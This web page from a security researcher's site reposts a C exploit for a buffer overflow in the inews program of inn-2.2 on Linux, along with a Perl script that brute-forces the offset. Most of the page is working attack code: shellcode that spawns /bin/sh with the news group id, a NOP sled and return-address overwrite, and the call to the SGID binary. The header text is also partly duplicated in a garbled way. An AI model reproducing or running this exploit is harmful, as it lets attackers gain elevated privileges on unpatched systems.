Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

inews_bof.c

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 2
inews_bof.c
inews_bof.c
inews_bof.c

/* (linux)inews[inn-2.2] buffer overflow, by Vade79->v9[This email address is being protected from spambots. You need JavaScript enabled to view it.].
this will inews_bof.c

/* (linux)inews[inn-2.2] buffer overflow, by Vade79->v9[This email address is being protected from spambots. You need JavaScript enabled to view it.].
this will give you a gid=news shell if /usr/bin/inews is SGID(news). i know
/usr/bin/inews comes default with versions of redhat, but i don't know about
other distributions.

cause (line601:inews.c): "(void)strcpy(from, HDR(_from));", use strncpy();

note: i found this while looking for a security hole in another program that
comes with inn, but it needs gid=news to run anyways. so this is a
bonus. also, you may want to clean up the defined TMPFILE afterwords.
after making this, i found another exploit of the same idea, this is
much more functional though.

the old perl script below for offset(s):

#!/usr/bin/perl
$i=$ARGV[0];
while(1){
print "offset: $i.\n";
system("./inews_bof $i");
$i+=100;
} */

#include <stdio.h>
#define NEWSGID 13 // the group id of news.
#define ALIGN 0 // return alignment.
#define PATH "/usr/bin/inews" // path to the inews program.
#define TMPFILE "/tmp/bad.post" // file to overflow inews buffer with.
#define SUBJECT "inews bug." // required file filler.
#define NEWSGROUP "alt.inn.bug" // required file filler.
#define DEFAULT_OFFSET 650 // usual offset.

static char exec[]=
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
"\x00" // yeah, group id of news here.
"\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
"\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x01"; // hex01 h00t!

long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[600]; // give or take a few. (528)
int i,offset,gid=NEWSGID;
long ret;
FILE *inewsfile;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
for(i=ALIGN;i<600;i+=4){*(long *)&bof[i]=ret;}
exec[10]=gid;
for(i=0;i<(600-strlen(exec)-100);i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
unlink(TMPFILE); // clean house.
inewsfile=fopen(TMPFILE,"w");
fprintf(inewsfile,"From: %s\n",bof); // required, woops.
fprintf(inewsfile,"Newsgroups: %s\n",NEWSGROUP); // required.
fprintf(inewsfile,"Subject: %s\n\n",SUBJECT); // required.
fclose(inewsfile);
printf("[ return address: 0x%lx, offset: %d, actual size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec));
if(execlp(PATH,"inews","-h",TMPFILE,0)){
printf("%s: failed, is %s the correct path?\n",argv[0],PATH);
exit(-1);
}
}
Social Media Share